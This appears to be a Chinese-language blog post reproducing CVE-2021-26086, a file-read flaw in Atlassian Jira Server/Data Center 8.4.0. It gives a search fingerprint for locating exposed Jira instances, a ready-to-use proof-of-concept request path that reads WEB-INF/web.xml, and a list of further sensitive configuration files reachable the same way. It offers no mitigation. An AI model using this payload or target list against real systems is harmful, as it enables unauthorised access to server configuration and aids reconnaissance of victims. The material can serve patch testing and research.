Atlassian Jira cfx 任意文件读取漏洞 #CVE-2021-26086

漏洞描述

Atlassian Jira Server/Data Center 8.4.0 – Limited Remote File Read/Include。

漏洞影响

Atlassian Jira Server/Data Center 8.4.0

网络测绘

app=”ATLASSIAN-JIRA”

漏洞复现

登录页面

20240513141650104-png

验证POC

/s/cfx/_/;/WEB-INF/web.xml

20240513141806531-1634610826119-05c0b0fe-2266-46bb-8b2a-9997824e6724-20220313163314907.4c1971b2_2024-05-13_14-17-46 (1)

可读取敏感配置文件

WEB-INF/web.xml
WEB-INF/decorators.xml
WEB-INF/classes/seraph-config.xml
META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容